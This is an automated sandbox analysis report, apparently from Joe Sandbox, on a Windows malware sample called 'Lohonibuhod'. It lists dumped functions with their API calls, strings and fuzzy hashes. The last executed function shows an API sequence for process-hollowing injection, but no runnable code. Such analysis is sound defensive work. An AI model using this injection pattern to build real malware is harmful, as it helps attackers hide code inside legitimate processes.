Associated: 00000006.00000002.364650267.0000000010005000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.364652581.0000000010006000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_Lohonibuhod.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID:
API String ID: 2238633743-0
Opcode ID: bef49b88d6b5075293cb2dd027ad9f0e01b9d6818a79c35dc3587d6c8c11ba85
Instruction ID: 25ec328a141864f677c70b46ba774ab13fbe30923e3e3e84977e3dfd8e9a3d85
Opcode Fuzzy Hash: bef49b88d6b5075293cb2dd027ad9f0e01b9d6818a79c35dc3587d6c8c11ba85
Instruction Fuzzy Hash: AC11C575200104EFDB14CF28C894E65BBE9FF5C358B24446DEA59DB361C732AD51CB90

Uniqueness

Uniqueness Score: -1.00%

Function 10001619 Relevance: 3.0, APIs: 2, Instructions: 20
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000,100013AA,00000000), ref: 1000162A

Part of subcall function 10001E5C: HeapAlloc.KERNEL32(00000000,00000140,1000163E), ref: 10001E69

HeapDestroy.KERNEL32 ref: 10001648

Memory Dump Source

Source File: 00000006.00000002.364645390.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.364642845.0000000010000000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.364647872.0000000010004000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.364650267.0000000010005000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.364652581.0000000010006000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_Lohonibuhod.jbxd

Similarity

API ID: Heap$AllocCreateDestroy
String ID:
API String ID: 2236781399-0
Opcode ID: f0ff528cfb4eee2c5d7f4ce2a576517689442160b2c3fce08d867651e9050fc8
Instruction ID: 78912efd5ff2d260f7491fd618bbb40f792ba6e4c89580ae4997f8cedd4c86b7
Opcode Fuzzy Hash: f0ff528cfb4eee2c5d7f4ce2a576517689442160b2c3fce08d867651e9050fc8
Instruction Fuzzy Hash: 9AE01274754311AAFF404B308DC97A636D5EB487C3F094425FA00C90BCEB72C540D611

Uniqueness

Uniqueness Score: -1.00%

Function 00401633 Relevance: 3.0, APIs: 2, Instructions: 12
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_onexit.MSVCRT ref: 00401640
__dllonexit.MSVCRT ref: 00401656

Memory Dump Source

Source File: 00000006.00000002.364623768.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.364621493.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.364626020.0000000000402000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.364628456.0000000000404000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Lohonibuhod.jbxd

Similarity

API ID: __dllonexit_onexit
String ID:
API String ID: 2384194067-0
Opcode ID: 26373c43a83e90b80799868412e9c9f3cfb509f275866719a99443ef04029b5d
Instruction ID: 81ddecd9d749891d54268572d570dc8348f50d7a07813ebda20330d722522a00
Opcode Fuzzy Hash: 26373c43a83e90b80799868412e9c9f3cfb509f275866719a99443ef04029b5d
Instruction Fuzzy Hash: FCC01230440300FBCA001F20BD0E5467F25A75573BB60863BF1A9351F6C7794610FA4D

Uniqueness

Uniqueness Score: -1.00%

Function 100025AA Relevance: 1.3, APIs: 1, Instructions: 85
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(?,00008000,00001000,00000004,00000000,00000000,000000E0,-000000C9,?,100022D0,000000E0,00000000,00000001,00000000), ref: 100025FB

Memory Dump Source

Source File: 00000006.00000002.364645390.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.364642845.0000000010000000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.364647872.0000000010004000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.364650267.0000000010005000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.364652581.0000000010006000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_Lohonibuhod.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: c024661bb34bb728b433060c083a65a30a491f3d0f3aa2d51cacd4275a428c02
Instruction ID: 514d770ac0748508e8fa3d1f3530390eec8423c13d8c92a20f474f81a8b783d2
Opcode Fuzzy Hash: c024661bb34bb728b433060c083a65a30a491f3d0f3aa2d51cacd4275a428c02
Instruction Fuzzy Hash: 3431AC716006068FE314CF18C894BA5BBE4FF443A4F25C2BEE5598B2A2D771E946CB40

Uniqueness

Uniqueness Score: -1.00%

Function 100026E3 Relevance: 1.3, APIs: 1, Instructions: 21
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapAlloc.KERNEL32(00000000,-0000000E,00000000,100026C7,000000E0,100026B4,00000001,10001CA6,00000001,?,?,?,?,?,?,100013F1), ref: 10002711

Memory Dump Source

Source File: 00000006.00000002.364645390.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.364642845.0000000010000000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.364647872.0000000010004000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.364650267.0000000010005000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.364652581.0000000010006000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_Lohonibuhod.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: 5db8cd96a34996fa335975745d6068250055bd7a4f9e48c63ee29c7f0749d283
Instruction ID: 7e25c0309bd6ba2bcfcb9b935d83e6d0fcf1ed80e2c121a0a829253fb72fbfa7
Opcode Fuzzy Hash: 5db8cd96a34996fa335975745d6068250055bd7a4f9e48c63ee29c7f0749d283
Instruction Fuzzy Hash: C3E08C3390953156F910A318AD81BCB3754DF053E1F070120FD587A0ECCB612C8045C4

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00401250 Relevance: 28.3, APIs: 14, Strings: 2, Instructions: 332
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000000,?,?,?,00000000), ref: 00401269
?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N@Z.MSVCP60(?,00000001,?,?,?,00000000), ref: 00401287
GetSidLengthRequired.ADVAPI32(?,?,00000001,?,?,?,00000000), ref: 00401328
CreateConsoleScreenBuffer.KERNEL32 ref: 00401352
sexuhus.JAHULOCAYEDO(?,?,00000001,?,?,?,00000000), ref: 00401378
??2@YAPAXI@Z.MSVCRT ref: 00401386

Part of subcall function 00401628: free.MSVCRT(00000000,004013EE,00000000,?,?,00000000), ref: 0040162C

Nuhazelaxim.YIDUYEVUTOG(00000000,00000000,?,?,00000000), ref: 004013EF
isupper.MSVCRT ref: 00401415
bibezarebowu.FIROZEDIKAMI(00000003,?,?,?,?,00000005,?,?,?,?,?,?,?,00000000), ref: 0040145D
??2@YAPAXI@Z.MSVCRT ref: 00401474
zejutuhodomo.NASEROPUXEQ(?,?,?,00000000,?,?,?,00000005,?,?,?,?,?,?,?,00000000), ref: 004014CF
?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N@Z.MSVCP60(?,00000001,?,?,?,?,?,?,?,00000005), ref: 00401502
_strdup.MSVCRT(00403020,?,00000001,?,?,?,?,?,?,?,00000005), ref: 00401542
exit.MSVCRT ref: 00401606

Strings

D0@, xrefs: 00401299
D0@, xrefs: 0040126F

Memory Dump Source

Source File: 00000006.00000002.364623768.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.364621493.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.364626020.0000000000402000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.364628456.0000000000404000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Lohonibuhod.jbxd

Similarity

API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??2@Grow@?$basic_string@$BufferConsoleCreateLengthNuhazelaximRequiredScreenTidy@?$basic_string@_strdupbibezarebowuexitfreeisuppersexuhuszejutuhodomo
String ID: D0@$D0@
API String ID: 1810937992-2163784678
Opcode ID: d203b04e52820c781a00f1add7da1b6300ef2eb0ac00234db61bdd8a3f930eb9
Instruction ID: d8dad6136998a42da6945c55500197d0af9414846aa5ac43a8f236ca2278ecf8
Opcode Fuzzy Hash: d203b04e52820c781a00f1add7da1b6300ef2eb0ac00234db61bdd8a3f930eb9
Instruction Fuzzy Hash: 84B156706043409FD724CF28DD9166BBBE5AB89301F58493FE986BB3E1D6389A05CB4D

Uniqueness

Uniqueness Score: -1.00%

Function 10002FD5 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 50
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(user32.dll), ref: 10002FE7
GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 10002FFF
GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 10003010
GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 1000301D

Strings

GetActiveWindow, xrefs: 1000300A
MessageBoxA, xrefs: 10002FF9
GetLastActivePopup, xrefs: 10003012
user32.dll, xrefs: 10002FE2

Memory Dump Source

Source File: 00000006.00000002.364645390.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.364642845.0000000010000000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.364647872.0000000010004000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.364650267.0000000010005000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.364652581.0000000010006000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_Lohonibuhod.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
API String ID: 2238633743-4044615076
Opcode ID: 49a944e3231b6e706c789a9ad4cc1282d3c311ed64a976ff2b4ae1f70f1e9cf3
Instruction ID: 09b9e86ffa65fbe342752e343ebc9caef3bc20d7d0779b60b1455dae67716503
Opcode Fuzzy Hash: 49a944e3231b6e706c789a9ad4cc1282d3c311ed64a976ff2b4ae1f70f1e9cf3
Instruction Fuzzy Hash: 9E018FB5602221AFF702CFB48CD4A5B7BECEB585D23425029F305D3128DF768A019B60

Uniqueness

Uniqueness Score: -1.00%

Function 100034B0 Relevance: 13.7, APIs: 9, Instructions: 177
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LCMapStringW.KERNEL32(00000000,00000100,100043C0,00000001,00000000,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 100034F2
LCMapStringA.KERNEL32(00000000,00000100,100043BC,00000001,00000000,00000000), ref: 1000350E
LCMapStringA.KERNEL32(?,00000100,00000020,00000001,00000000,00000100,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 10003557
MultiByteToWideChar.KERNEL32(00000000,00000101,00000020,00000001,00000000,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 1000358F
MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 100035E7
LCMapStringW.KERNEL32(?,?,?,00000000,00000000,00000000), ref: 100035FD
LCMapStringW.KERNEL32(?,?,?,00000000,?,?), ref: 10003630
LCMapStringW.KERNEL32(?,?,?,?,?,00000000), ref: 10003698

Memory Dump Source

Source File: 00000006.00000002.364645390.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.364642845.0000000010000000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.364647872.0000000010004000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.364650267.0000000010005000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.364652581.0000000010006000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_Lohonibuhod.jbxd

Similarity

API ID: String$ByteCharMultiWide
String ID:
API String ID: 352835431-0
Opcode ID: 855ae5721975aee6c9e0a35035b7793e6aaf39e7440f679f12da0cea1cf40c02
Instruction ID: 4c5bb73f013cab1c6f7c12613be114ae7c2c48ecb446f4eb1073e524c9067a0a
Opcode Fuzzy Hash: 855ae5721975aee6c9e0a35035b7793e6aaf39e7440f679f12da0cea1cf40c02
Instruction Fuzzy Hash: C5517872900249FBEF22CF95CC84A9F7BB9FB487D0F118119FA14A1268D7329A10DB61

Uniqueness

Uniqueness Score: -1.00%

Function 00021000 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 134
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

toupper.MSVCRT ref: 000210B1
toupper.MSVCRT ref: 000210BE
toupper.MSVCRT ref: 000210EE
toupper.MSVCRT ref: 000210FB
__allrem.LIBCMT ref: 0002114C
wsprintfA.USER32 ref: 00021184

Strings

%I6, xrefs: 00021038

Memory Dump Source

Source File: 00000006.00000002.364588049.0000000000021000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00020000, based on PE: true

Associated: 00000006.00000002.364585750.0000000000020000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.364590151.0000000000022000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.364592294.0000000000024000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_20000_Lohonibuhod.jbxd

Similarity

API ID: toupper$__allremwsprintf
String ID: %I6
API String ID: 2402622903-801520844
Opcode ID: 0be28cb861da07e3b17897218c5ed904d3a9ffb6f0add5f0731a8c8a2366ec37
Instruction ID: a1a75057446fa96ee258feb4d9b88e23d723e80aae2239dde555ece15b4b8fc3
Opcode Fuzzy Hash: 0be28cb861da07e3b17897218c5ed904d3a9ffb6f0add5f0731a8c8a2366ec37
Instruction Fuzzy Hash: 1A410571A00154AFF720CB78FC905AABBF5E759310328066AE944C32A1D77C8B16CB64

Uniqueness

Uniqueness Score: -1.00%

Function 10001D09 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 100fileCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000), ref: 10001D76
GetStdHandle.KERNEL32(000000F4,100042F4,00000000,?,00000000,00000000), ref: 10001E4C
WriteFile.KERNEL32(00000000), ref: 10001E53

Strings

Microsoft Visual C++ Runtime Library, xrefs: 10001E22
Runtime Error!Program: , xrefs: 10001DDC
..., xrefs: 10001DC8
<program name unknown>, xrefs: 10001D86

Memory Dump Source

Source File: 00000006.00000002.364645390.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.364642845.0000000010000000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.364647872.0000000010004000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.364650267.0000000010005000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.364652581.0000000010006000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_Lohonibuhod.jbxd

Similarity

API ID: File$HandleModuleNameWrite
String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
API String ID: 3784150691-4022980321
Opcode ID: 06d94f5684f212a408199dcccfad84c9767cf989d3c5a332ece30ef5d8ddfc03
Instruction ID: 12d08507676daea1b6c2e72e2ddab763b32ec051a1d2239a28ebf34ab02f6107
Opcode Fuzzy Hash: 06d94f5684f212a408199dcccfad84c9767cf989d3c5a332ece30ef5d8ddfc03
Instruction Fuzzy Hash: 0B31C1B2A00219AFFB10DBA0CC85FDE77BDEB453C0F110466F644E605DEB74AA448B51

Uniqueness

Uniqueness Score: -1.00%

Function 10001B9E Relevance: 12.1, APIs: 8, Instructions: 132COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,100013F1), ref: 10001BB9
GetEnvironmentStrings.KERNEL32(?,?,?,?,100013F1), ref: 10001BCD
GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,100013F1), ref: 10001BF9
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,?,?,?,?,?,100013F1), ref: 10001C31
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,?,100013F1), ref: 10001C53
FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,100013F1), ref: 10001C6C
GetEnvironmentStrings.KERNEL32(?,?,?,?,?,?,100013F1), ref: 10001C7F
FreeEnvironmentStringsA.KERNEL32(00000000), ref: 10001CBD

Memory Dump Source

Source File: 00000006.00000002.364645390.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.364642845.0000000010000000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.364647872.0000000010004000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.364650267.0000000010005000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.364652581.0000000010006000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_Lohonibuhod.jbxd

Similarity

API ID: EnvironmentStrings$ByteCharFreeMultiWide
String ID:
API String ID: 1823725401-0
Opcode ID: 0168f4ae92ed445595a3979691d59d356b5665e82a06f7d9d48edbbe6ddaae78
Instruction ID: dae52657fee3e9ec5a16757c2413bf873a257e6dfecc64e0f04b01ef60e63039
Opcode Fuzzy Hash: 0168f4ae92ed445595a3979691d59d356b5665e82a06f7d9d48edbbe6ddaae78
Instruction Fuzzy Hash: 4B31C5B25482666FF310EFB45CC4CAB76DCE7492D97130929F655D3108EA71CC4147A5

Uniqueness

Uniqueness Score: -1.00%

Function 100036FF Relevance: 9.1, APIs: 6, Instructions: 117COMMON

Download Yara Rule

APIs

GetStringTypeW.KERNEL32(00000001,100043C0,00000001,00000000,?,00000100,00000000,10002B99,00000001,00000020,00000100,?,00000000), ref: 1000373E
GetStringTypeA.KERNEL32(00000000,00000001,100043BC,00000001,?), ref: 10003758
GetStringTypeA.KERNEL32(00000000,?,00000100,00000020,00000001,?,00000100,00000000,10002B99,00000001,00000020,00000100,?,00000000), ref: 1000378C
MultiByteToWideChar.KERNEL32(10002B99,00000101,00000100,00000020,00000000,00000000,?,00000100,00000000,10002B99,00000001,00000020,00000100,?,00000000), ref: 100037C4
MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?), ref: 1000381A
GetStringTypeW.KERNEL32(?,?,00000000,?,?,?), ref: 1000382C

Memory Dump Source

Source File: 00000006.00000002.364645390.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.364642845.0000000010000000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.364647872.0000000010004000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.364650267.0000000010005000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.364652581.0000000010006000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_Lohonibuhod.jbxd

Similarity

API ID: StringType$ByteCharMultiWide
String ID:
API String ID: 3852931651-0
Opcode ID: 894c64aca5469eba838abde4285f91193999ec3512647c7fc1f8926f74e1cf01
Instruction ID: bc9f20c0ccc02961af6768ffb7fee715c847f53d1467b43647a15e73684080cd
Opcode Fuzzy Hash: 894c64aca5469eba838abde4285f91193999ec3512647c7fc1f8926f74e1cf01
Instruction Fuzzy Hash: C7418DB190425AAFEB22CF98CC85ADF7FBCEB046D0F118529FA05E2254DB319910CB90

Uniqueness

Uniqueness Score: -1.00%

Function 100016CA Relevance: 7.6, APIs: 5, Instructions: 143COMMON

Download Yara Rule

APIs

GetStartupInfoA.KERNEL32 ref: 10001723
GetFileType.KERNEL32 ref: 100017C9
GetStdHandle.KERNEL32(-000000F6), ref: 10001822
GetFileType.KERNEL32 ref: 10001830
SetHandleCount.KERNEL32 ref: 10001867

Memory Dump Source

Source File: 00000006.00000002.364645390.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.364642845.0000000010000000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.364647872.0000000010004000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.364650267.0000000010005000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.364652581.0000000010006000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_Lohonibuhod.jbxd

Similarity

API ID: FileHandleType$CountInfoStartup
String ID:
API String ID: 1710529072-0
Opcode ID: 2a6af7d28c69e60efa24dfdd8625100fb673ea20a26b96f46acf4ebd8e682d04
Instruction ID: ba8dd628c9140b786af7068798eac55a619a7d8de91ca2ea3bc2b647b0258487
Opcode Fuzzy Hash: 2a6af7d28c69e60efa24dfdd8625100fb673ea20a26b96f46acf4ebd8e682d04
Instruction Fuzzy Hash: 4C51E971A082558BF721CB28CCC87963BF5FB013E1F5A8328E49ADB2E9DB309945C711

Uniqueness

Uniqueness Score: -1.00%

Function 002210D0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 002210FE
_initterm.MSVCRT ref: 00221129
free.MSVCRT(?,?,002211BB,?,?,?), ref: 00221166

Strings

2t, xrefs: 002210E6

Memory Dump Source

Source File: 00000006.00000002.364608956.0000000000221000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00220000, based on PE: true

Associated: 00000006.00000002.364606591.0000000000220000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.364611624.0000000000222000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.364614006.0000000000224000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_220000_Lohonibuhod.jbxd

Similarity

API ID: _inittermfreemalloc
String ID: 2t
API String ID: 1678931842-3527913779
Opcode ID: 855a6846132a5d1281114d7ed38bc9498407cf7cace9050d94217eb1a3baa425
Instruction ID: 8d4b9888c2bd47f2f646cf93143560ea66397dde565a5cd7e05023e98582a5ce
Opcode Fuzzy Hash: 855a6846132a5d1281114d7ed38bc9498407cf7cace9050d94217eb1a3baa425
Instruction Fuzzy Hash: 27117C32724262FBD734CFE4FC4DF6577A1AB20751B20101AEA09C6260DB799A72CB10

Uniqueness

Uniqueness Score: -1.00%

Function 000310BB Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 000310E9
_initterm.MSVCRT ref: 00031114
free.MSVCRT(?,?,000311A6,?,?,?), ref: 00031151

Strings

2t, xrefs: 000310D1

Memory Dump Source

Source File: 00000006.00000002.364596780.0000000000031000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00030000, based on PE: true

Associated: 00000006.00000002.364594450.0000000000030000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.364599082.0000000000032000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_30000_Lohonibuhod.jbxd

Similarity

API ID: _inittermfreemalloc
String ID: 2t
API String ID: 1678931842-3527913779
Opcode ID: d240490eda68ece15e547cfaa14b9270621bc40846813fa8500705a4d7adb240
Instruction ID: a0a064aa427b8aebd1c7047c99558d2e5d346c42bd185d792507d63c7c10e57b
Opcode Fuzzy Hash: d240490eda68ece15e547cfaa14b9270621bc40846813fa8500705a4d7adb240
Instruction Fuzzy Hash: 51117C362002018BE72B8B26ECC5BE677FCF708B61F104019EA01C61A0EB399980DB40

Uniqueness

Uniqueness Score: -1.00%

Function 000212A4 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 000212D2
_initterm.MSVCRT ref: 000212FD
free.MSVCRT(?,?,0002138F,?,?,?), ref: 0002133A

Strings

2t, xrefs: 000212BA

Memory Dump Source

Source File: 00000006.00000002.364588049.0000000000021000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00020000, based on PE: true

Associated: 00000006.00000002.364585750.0000000000020000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.364590151.0000000000022000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.364592294.0000000000024000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_20000_Lohonibuhod.jbxd

Similarity

API ID: _inittermfreemalloc
String ID: 2t
API String ID: 1678931842-3527913779
Opcode ID: 94a21c7ba4b442c7e73632bbcb3e8967706b996784bccdd94226d96fc5dd3ed2
Instruction ID: 7f88e3eea342c10e60d911fbc82484ef5fa196bcb21a894ed2e57b5d478a6c0c
Opcode Fuzzy Hash: 94a21c7ba4b442c7e73632bbcb3e8967706b996784bccdd94226d96fc5dd3ed2
Instruction Fuzzy Hash: 29115E31304221EBF774CF65FC99BA577A6B724311B30001DE505CA5A0DB3C9A62CB54

Uniqueness

Uniqueness Score: -1.00%

Function 10002AFA Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 124COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,00000000), ref: 10002B0E

Strings

, xrefs: 10002B57
, xrefs: 10002B33

Memory Dump Source

Source File: 00000006.00000002.364645390.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.364642845.0000000010000000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.364647872.0000000010004000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.364650267.0000000010005000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.364652581.0000000010006000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_Lohonibuhod.jbxd

Similarity

API ID: Info
String ID: $
API String ID: 1807457897-3032137957
Opcode ID: e4228b001db0409833e9d38f65e39e27da4081846a0795702f68ba4dd2427d8b
Instruction ID: 003f6447f42cfeb74655a4253d6df3cc11f9e005fddf9b97507d5db6970036ca
Opcode Fuzzy Hash: e4228b001db0409833e9d38f65e39e27da4081846a0795702f68ba4dd2427d8b
Instruction Fuzzy Hash: DB413A310083A89AFB26CB14DC89FEF7F98EB017C0F1005F5DA85DB05AC7224948DBA1

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: msiexec.exePID: 2748, Parent PID: 1396COMMON

Execution Graph

Execution Coverage:	65.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	69
Total number of Limit Nodes:	3

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00402298 Relevance: 49.1, APIs: 17, Strings: 11, Instructions: 131
libraryloaderinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(kernel32.dll), ref: 004022A9
GetProcAddress.KERNEL32(?,SetThreadContext), ref: 004022E3
GetProcAddress.KERNEL32(?,ResumeThread), ref: 004022F0
GetProcAddress.KERNEL32(?,CreateProcessA), ref: 004022FD
GetModuleHandleA.KERNEL32(ntdll.dll,NtUnmapViewOfSection), ref: 0040230C
GetProcAddress.KERNEL32(00000000), ref: 00402313
GetProcAddress.KERNEL32(?,VirtualAllocEx), ref: 00402320
GetProcAddress.KERNEL32(?,WriteProcessMemory), ref: 0040232D
GetProcAddress.KERNEL32(?,GetThreadContext), ref: 0040233A
CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,00000000), ref: 00402356
NtUnmapViewOfSection.NTDLL(00000000,?), ref: 0040235F
